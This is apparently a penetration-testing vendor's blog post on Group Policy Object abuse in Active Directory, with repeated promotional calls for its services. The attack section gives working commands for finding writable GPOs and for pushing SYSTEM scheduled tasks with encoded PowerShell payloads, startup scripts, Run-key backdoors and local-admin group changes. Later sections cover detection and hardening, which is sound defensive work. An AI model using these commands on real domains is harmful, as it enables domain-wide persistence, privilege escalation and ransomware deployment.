GPO Abuse

Group Policy Objects are one of the most powerful administrative tools in any Windows environment. They control everything from software deployment and login scripts to security settings and user privileges across an entire domain. That power, however, cuts both ways. In the hands of an attacker who has already gained a foothold in your network, GPOs become a devastating weapon capable of achieving persistence, lateral movement, and domain-wide compromise with minimal noise.

This blog breaks down exactly how GPO abuse works, the specific techniques and commands attackers use, and what you can do to detect and stop it before it becomes a breach.

What Is a Group Policy Object and Why Does It Matter for Security

A Group Policy Object is a virtual collection of settings that Active Directory applies to users and computers within a domain, site, or organizational unit (OU). Administrators use GPOs to enforce security baselines, push configurations, and control behavior at scale.

The problem is that GPO permissions are often misconfigured. When a non-privileged user or a compromised service account has write access to a GPO, an attacker can modify it to execute arbitrary code on every machine that falls under its scope, often without triggering a single alert.

This is not a theoretical threat. GPO abuse is a well-documented post-exploitation technique actively used in ransomware deployments, APT campaigns, and red team engagements. If your Active Directory is not regularly tested, you may already have exploitable misconfigurations sitting in your environment right now.

Get your Active Directory professionally assessed by Redfox Cybersecurity

How GPO Abuse Works: The Attack Chain

Step 1: Enumeration of GPO Permissions

Before an attacker can abuse a GPO, they need to find one they can modify. This is done by enumerating GPO permissions across the domain and identifying objects where non-privileged users have WriteProperty, GenericWrite, GenericAll, or WriteDacl rights.

Using PowerView (PowerSploit):

Import-Module .\PowerView.ps1
Get-NetGPO | ForEach-Object {
   $gpo = $_
   Get-ObjectAcl -ResolveGUIDs -Name $gpo.displayName | Where-Object {
       $_.ActiveDirectoryRights -match "Write" -and
       $_.IdentityReference -notmatch "Domain Admins|SYSTEM|Enterprise Admins"
   }
}


This command pulls every GPO in the domain and filters for write-level ACL entries that belong to non-privileged identities. If the output is non-empty, your environment is likely vulnerable.

Using BloodHound:

BloodHound's graph-based analysis makes this even easier. After running SharpHound to collect data, query:

MATCH p=(u)-[:GenericWrite|WriteDacl|GenericAll]->(g:GPO) RETURN p


This Cypher query visually maps every attack path from a compromised user or computer to a writeable GPO, surfacing lateral movement opportunities in seconds.

Step 2: Identifying GPO Scope and Linked OUs

Once a writeable GPO is found, the next step is determining which machines and users it applies to. A GPO linked to a high-value OU such as Domain Controllers or Servers is far more impactful than one scoped to a single workstation.

Get-NetGPO -GPOname "Vulnerable GPO Name" | Select-Object -ExpandProperty adspath

Get-NetOU -GUID "GPO-GUID-HERE" | ForEach-Object {
   Get-NetComputer -ADSpath $_.distinguishedname
}


This tells the attacker exactly which computers will receive the malicious policy, allowing them to prioritize targets before making any modifications.

Step 3: Modifying the GPO to Execute Code

This is where the real damage happens. An attacker with write access to a GPO can add a malicious immediate scheduled task, a startup script, or a software installation package that runs on every affected machine during the next Group Policy refresh.

Using SharpGPOAbuse:

SharpGPOAbuse is a purpose-built tool for this technique. It allows an attacker to add an immediate scheduled task to a vulnerable GPO without touching the SYSVOL manually.

SharpGPOAbuse.exe --AddComputerTask --TaskName "UpdateService" \
--Author "NT AUTHORITY\SYSTEM" \
--Command "cmd.exe" \
--Arguments "/c powershell.exe -nop -w hidden -enc <base64_payload>" \
--GPOName "Vulnerable GPO Name"


This creates a scheduled task under the GPO that runs as SYSTEM on every machine in scope. The next Group Policy refresh, which occurs every 90 minutes by default, triggers execution.

To force an immediate refresh for testing purposes:

gpupdate /force


Adding a Malicious Startup Script:

Alternatively, an attacker can drop a script into SYSVOL and register it as a startup or logon script within the GPO:

# Copy payload to SYSVOL
Copy-Item ".\payload.ps1" "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies\{GPO-GUID}\Machine\Scripts\Startup\"

# Register via GPO registry edit or direct GptTmpl.inf modification


The script runs with SYSTEM-level privileges on every computer in the linked OU at boot.

Step 4: Persistence via GPO-Based Registry Modifications

Beyond immediate code execution, attackers use GPO abuse to establish persistent footholds by pushing registry keys that ensure malware survives reboots.

Set-GPRegistryValue -Name "Vulnerable GPO Name" \
-Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" \
-ValueName "SystemUpdate" \
-Type String \
-Value "C:\Windows\Temp\backdoor.exe"


This sets a run key via Group Policy, ensuring the backdoor executes on every startup for every machine in scope, giving the attacker persistent access that survives reimaging if the GPO itself is not cleaned up.

Step 5: Privilege Escalation via GPO-Linked Local Admin Additions

One of the most effective GPO abuse scenarios is using a writeable GPO to add a controlled account to the local Administrators group across all scoped machines. This is clean, policy-driven, and blends into normal administrative activity.

Using Restricted Groups via GPO:

Set-GPRegistryValue -Name "Vulnerable GPO Name" \
-Key "HKLM\SYSTEM\CurrentControlSet\Services\<service>" \
-ValueName "ObjectName" -Type String -Value "DOMAIN\attacker_account"


Or through direct manipulation of the GptTmpl.inf file inside the GPO's SYSVOL path:

[Group Membership]
*S-1-5-32-544__Members = *S-1-5-21-<domain>-<attacker-RID>


After the next GPO refresh, the attacker account gains local admin access on every machine in the OU, enabling pass-the-hash, credential dumping, and further lateral movement without touching a domain controller directly.

GPO Abuse in Ransomware Campaigns

GPO abuse is not just a red team technique. Multiple ransomware groups, including those deploying LockBit and Ryuk variants, have been documented using GPO modifications to push ransomware payloads domain-wide. Once an operator has domain admin or even delegated GPO write access, they can encrypt thousands of endpoints simultaneously via a single GPO-linked startup script.

This is precisely why attackers invest heavily in gaining GPO write access during the post-exploitation phase. The blast radius is enormous, and the execution is nearly silent until it is too late.

If you are responsible for an Active Directory environment and have not had a professional red team engagement or penetration test recently, your exposure may be far greater than you realize.

Assess your ransomware readiness with Redfox Cybersecurity's penetration testing services

Detection: How to Catch GPO Abuse Before It Detonates

Monitor GPO Modification Events

Windows logs GPO changes under Event ID 5136 (Directory Service Changes) in the Security event log. Alert on any modifications to GPO objects originating from accounts outside your standard change management process.

Event ID: 5136
Object Class: groupPolicyContainer
Attribute: gPCFileSysPath | gPCMachineExtensionNames | versionNumber


Spike in versionNumber increments combined with unusual modifiedBy accounts is a reliable indicator of unauthorized GPO modification.

Audit SYSVOL for Unauthorized Files

Scheduled tasks and scripts registered via GPO are stored in SYSVOL. Monitor for new or modified files in:

\\<domain>\SYSVOL\<domain>\Policies\{GPO-GUID}\Machine\Scripts\
\\<domain>\SYSVOL\<domain>\Policies\{GPO-GUID}\User\Scripts\


Any unexpected .ps1, .bat, .vbs, or .exe files in these paths warrant immediate investigation.

Use BloodHound for Continuous Attack Path Analysis

Running periodic BloodHound collections and querying for GPO write paths is one of the most effective ways to proactively identify misconfigurations before attackers exploit them:

MATCH p=shortestPath((u:User)-[*1..]->(g:GPO))
WHERE u.name <> "Domain Admins@DOMAIN.LOCAL"
RETURN p


Any non-privileged user appearing in this output represents a potential GPO abuse path that needs remediation.

Remediation: Hardening GPO Permissions

Audit and Remove Excessive GPO ACLs

Get-GPO -All | ForEach-Object {
   $report = Get-GPPermissions -Guid $_.Id -All
   $report | Where-Object { $_.Permission -match "GpoEditDeleteModifySecurity" -and
       $_.Trustee.SidType -ne "WellKnownGroup" }
}


Review every account with GpoEditDeleteModifySecurity permission. Delegate GPO editing rights only to dedicated, monitored administrative accounts with enforced MFA.

Enable GPO Change Auditing

Ensure the following audit policy is active across your domain:

Audit Directory Service Changes: Success, Failure


This populates Event ID 5136 and gives your SIEM the visibility needed to alert on GPO tampering in real time.

Enforce Least Privilege on SYSVOL

Restrict write access to SYSVOL shares to Domain Admins and SYSTEM only. Regularly scan for files in GPO script directories that were not introduced through your change management process.

Why Professional Penetration Testing Is Non-Negotiable

Understanding GPO abuse conceptually is one thing. Knowing whether your specific environment is actually exploitable requires a hands-on assessment by experienced professionals who think like attackers.

Redfox Cybersecurity offers comprehensive Active Directory penetration testing and red team engagements that specifically target GPO misconfigurations, ACL abuse paths, Kerberoasting opportunities, and the full spectrum of modern AD attack techniques. Their assessments go beyond automated scanning to deliver real-world attack simulation with actionable remediation guidance.

Explore Redfox Cybersecurity's full range of penetration testing services

Whether you are a small enterprise with a single domain or a large organization with complex multi-forest environments, understanding your GPO attack surface before a real adversary does is one of the most impactful security investments you can make.

Key Takeaways

Group Policy Objects are a critical but frequently overlooked attack surface in Active Directory environments. Attackers with even limited write access to a GPO can achieve domain-wide code execution, persistent access, and mass ransomware deployment with straightforward, well-documented tooling. Detection is possible but requires deliberate logging, SYSVOL monitoring, and proactive ACL auditing.

The organizations that survive sophisticated Active Directory attacks are not the ones with the most tools. They are the ones that regularly test their defenses, understand their exposure, and act on findings before adversaries do.

Stop guessing about your GPO attack surface. Get a professional assessment from Redfox Cybersecurity today and find out exactly where you stand before an attacker does.

‍